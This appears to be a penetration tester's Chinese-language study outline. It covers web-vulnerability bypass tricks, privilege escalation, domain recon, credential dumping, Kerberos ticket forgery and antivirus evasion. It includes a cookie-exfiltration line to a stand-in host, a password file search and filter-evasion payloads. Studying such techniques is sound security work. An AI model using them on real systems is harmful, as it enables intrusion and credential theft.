一部分,有时间再改改。
个人介绍
自学了python爬虫 django web开发 php审计 最近在学java
大学计算机应用技术 开设javase javaweb csharp unity
阅读了tp源代码 分析多版本RCE
1月份Java审计jndi rmi weblogic t3反序列化 xmldecoder shiro rememberme fastjson
跟踪分析最新漏洞 写写东西
内网看了github的内网渗透
SQL注入
分类
- 联合
- 盲注
- 报错
- 堆叠
- 宽字节
- header注入
注入位置
- select * from wp_inject where id='1'
- select * from wp_user where 1='inject'
- select * from wp_user where 1='1' order by inject
- select * from wp_user where 1=1 order by 1 limit inject
bypass
- 大小写
- 双写
- 打乱正则 注释/**/ 换行%0A
- 等价函数
- 超长字符串
- 畸形http协议 分块传输
- 容器特性
- 堆叠 MSSQL declare hex MYSQL prepare execute
- 盲注过滤逗号 ord(trim(leading 'a' from 'asd'))
文件操作
- MySQL into outfile自动换行 dumpfile 日志getshell load_file() load data读文件拓展攻击面
- MSSQL xp_cmdshell sp_oamethod 读文件BULK INSERT 表 from '文件名'
- PostgreSQL copy from copy to
- Redis config set 写web目录 写ssh 写计划任务
XXE
- 回显
- 无回显 伪协议带外
- XXE到RCE ntlm中继
拓展使用SSRF,Linux读本地dtd文件。
SSRF
- SFTP
- FTP
- Dict
- gopher
- TFTP
- file
- ldap
gopher 可用GET/POST 万精油协议
bypass:
- 解析url缺陷 http://A.com@10.10.10.10
- 短网址
- 进制转换
- 省略模式
- js跳转
- xip.io
- 手动加端口
- 127。0。0。1
- dns重绑定
- ipv6
实际利用
- fastcgi
- redis未授权
- MySQL未授权
命令执行
bypass
- ${IFS}代替空格
- $变量拼接
- 管道符| <>重定向
- base64
- 单引号双引号反斜线花括号 ca''t fla""g ca\t fl\ag {cat,./flag}
- 构造文件 c>wget a>wget t>wget 然后sh wget
- 反引号
`id`
文件包含
- 本地文件包含
- 远程文件包含
限制:open_basedir allow_url_include allow_url_fopen on
bypass
- 包含session、log、ssh
- 包含php://input 需要allow_url_include on
- 伪协议相关 php://filter读文件 phar:// zip://
- 限制前缀 ../
- 限定后缀 file.php?file=http://127.0.0.1/index.txt? 或者#锚点
- 最大长度截断 00截断
bypass disable_function
- dl putenv LD_PRELOAD劫持环境变量
- sendmail
- php7 exp
- win com
- 其他函数
- 攻击php-fpm
XSS
- 反射
- 存储
- dom
限制:同源策略、chrome xss auditor、csp
同源策略
- 同协议、域名、端口
限制cookie、dom、ajax
跨域
- jsonp
- html跨域标签
csp
- location.href='xx.com?'+document.cookie
- link引用css
- iframe 通过B页面操作A页面的dom
扫内网IP:其实就是WebRTC判断内网网段,然后引用内网资源
文件上传
校验方
- 客户端js校验
- 服务端 文件头 文件内容 后缀(白名单、黑名单、关键字)
- waf
bypass
- 禁用js
- content/type
- gif89a
- 白名单 解析漏洞 /1.asp/1.jpg 1.asp;.jpg 1.php.owf.rar 1.jpg/.php
- 黑名单 1.php345 phtml 大小写 双写 ::$DATA 空格 分号 点 cer asa
- 截断 1.php%00.jpg 1.jpg/%20\0.php
- 畸形数据包 文件包含 垃圾数据 filename
代码相关
PHP:
- preg正则回溯
- 亦或webshell
- 反序列化
__wakeup()
漏洞:当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行 - phar:// 拓展反序列化攻击面
- thinkphp 源码阅读 RCE
- 7.2之后php特性assert preg/e unserialize()提供过滤
JAVA:
- JNDI
- RMI
- shiro
- fastjson
- weblogic
审计关键字
readObejct() 反序列化
parseObject()
readUnshared()
parse() XXE
HttpURLConnection SSRF
HttpClient
${} SQL
execute()
query()
FileOutputStream 上传
BufferedOutputStream
new File()
Runtime.getRuntime.exec 命令执行
ProcessBuilder
lookup() JNDI注入
invoke() 反射
Python:
- 多线程、多进程、协程 线程池、队列 锁
- SQL盲注 二分法
- django flask web开发
提权
- exp
- 数据库
- 第三方服务
- stealtoken
- suid
MySQL udf、mof提权 mssql2005 xp_cmdshell默认system权限 postgresql调用so库提权 oracle提权(存储过程、反序列化)
计划任务文件可控 敏感信息
bypass uac
- 计划任务
- 劫持系统dll
msf和cs内置有插件。
bypass applocker
微软白名单绕过
- 利用hta文件
- 利用jscript
- 利用powershell
- 利用InstallUtil
- 利用regsvcs
- rundll32.exe
- msbuild
- 注入system进程
内网渗透
收集信息
- nbtscan
- 网络拓扑 arp netstat
- 安装软件
- net view net time net share
- hostname
- net user /domain net localgroup /domain net accounts /domain
- dsquery ldap AdFind
- nltest /domain_trusts
- findstr /si password *.txt
- spn
- sysvol gpp
- ipc链接
- vpn ssh密码 bat
抓密码
- Mimikatz wce
- procdump
- sqldumper
- ssp
票据
- 金票
- 银票
黄金票据的前提:
- 域名称
- 域SID
- krbtgt账户密码
- 伪造用户名
白银票据的前提
- 域名称
- 域SID
- 域的服务账户的密码hash
- 伪造用户名
黄金白银票据不同之处
-
访问权限不同
Golden Ticket是伪造的TGT(Ticket Granting Ticket),所以可以获取任何Kerberos服务权限。
Silver Ticket是伪造的TGS,也就是说其范围有限,只能访问指定的服务权限 -
加密方式不同
Golden Ticket是由krbtgt的hash加密
Silver Ticket是由服务账户(通常为计算机账户)hash加密 -
认证流程不同
Golden Ticket在使用的过程需要同域控通信
Silver Ticket在使用的过程不需要同域控通信
横向移动
- pass the hash
- 17010
- 14068
- gpp
- web或其他服务
权限维持
太多了,不在这写了。
免杀
webshell查杀
- 正则匹配 D盾
- openrasp
- 深度学习
- 沙盒
绕过
- 算法加密
- 打乱正则
- 反序列化
- 变量覆盖
- 文件包含
- 无中生有
- java反射
- 信息不对称 文件名 请求头
上线
- openssl流量加密
- 白加黑
- pyinstaller aeskey 打包 go打包
- 外部输入loader 二次dnsloader
- powershell混淆 定位特征码 填充花指令 替换资源 加壳
逆向
- 反虚拟机反调试反沙箱
- 加壳
- 进程判断
- sleep 600 时间验证
算法及设计模式
- 代理模式
电影院在电影播放开始、结束的时候插广告。一句话就是不对原有代码进行修改就对原有功能进行拓展。aop切面编程
- 动态代理
- 静态代理
- 设计模式
工厂模式
- 简单工厂 switch 判断用户传入型号返回具体对象
- 工厂方法 抽象出来整个工厂 不同型号的车使用不同的工厂
- 抽象工厂 抽象出来整个产品 不同型号的车的不同配件交给不同工厂做
单例模式
- Runtime 保证只有一个实例运行 写文件操作
有趣的姿势
tomcat不出网回显 内存无日志shell
weblogic IIOP 2551 重写 IOPProfile